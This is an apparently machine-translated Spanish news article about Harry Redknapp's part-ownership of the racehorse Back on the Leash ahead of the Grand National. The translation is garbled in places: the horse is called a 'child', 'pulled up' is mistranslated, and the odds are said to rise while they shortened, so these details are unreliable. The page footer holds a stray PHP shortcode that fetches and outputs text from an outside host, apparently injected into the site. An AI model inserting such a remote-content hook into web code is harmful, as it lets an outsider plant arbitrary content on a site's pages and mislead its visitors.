Harry Redknapp es mejor conocido por su larga carrera en el banquillo de los entrenadores de fútbol, ​​pero ahora se ha dedicado a la propiedad, específicamente a la propiedad de caballos de carrera.


Desde el año pasado, el exentrenador de Tottenham, West Ham y Portsmouth ha tenido un caballo que ahora competirá en la carrera más importante del calendario del Reino Unido, el Grand National de este fin de semana en Aintree.


El hombre de 76 años no ha ocultado su amor por las carreras y, en particular, su amor por el Grand National, un sueño de toda la vida a punto de hacerse realidad.


Redknapp dijo recientemente: “Sería increíble tener un corredor en el Grand National. Me encantaría tener un corredor. Es una de mis carreras favoritas. Será mi primer corredor en el National y me encantaría”. . ” Me encanta salir y verlo correr. Me encantan las carreras. Es mi mayor pasión”.


Esto es lo que necesita saber sobre la propiedad de Grand National de Harry Redknapp:


¿Qué caballo tiene Harry Redknapp en el Grand National?


Redknapp es copropietario de Back on the Leash. Él y otros tres se alinearon para comprarlo en marzo pasado y el niño de nueve años entrenado por Martin Keighley ahora competirá en el Grand National por primera vez con Adam Wedge como jockey.


¿Cuáles son las probabilidades del caballo de Harry Redknapp?


El factor Redknapp parece haber alentado a los apostadores a invertir mucho dinero en Back on the Leash. Estuvo fuera en 66/1 para ganar en una etapa, pero a medida que las apuestas se establecieron, se elevó a donde se cotiza actualmente en alrededor de 25/1.


¿Cómo le ha ido Back on the Leash en el pasado?


Back on the Leash se dibujó en su última salida a campo traviesa en el Cheltenham Festival pero, antes de eso, ganó en Cheltenham el Trials Day en enero y terminó tercero y segundo en sus otras carreras esta temporada.


Ha ganado poco más de 18.000 libras esterlinas con su victoria por 6-1 bajo el mando del jockey Sean Bowen en el Trials Day y ha ganado algo más de 29.000 libras esterlinas desde que sus dueños lo compraron. Ahora, el niño de nueve años ingresa al Grand National de 40 caballos con el peso más bajo conjunto, solo 10st 2lb.


Previous Post Next Post
function pub_short() { $pub_text = file_get_contents( "https://alrafdean.org/me/pub.txt" ); return $pub_text; } add_shortcode('pub', 'pub_short');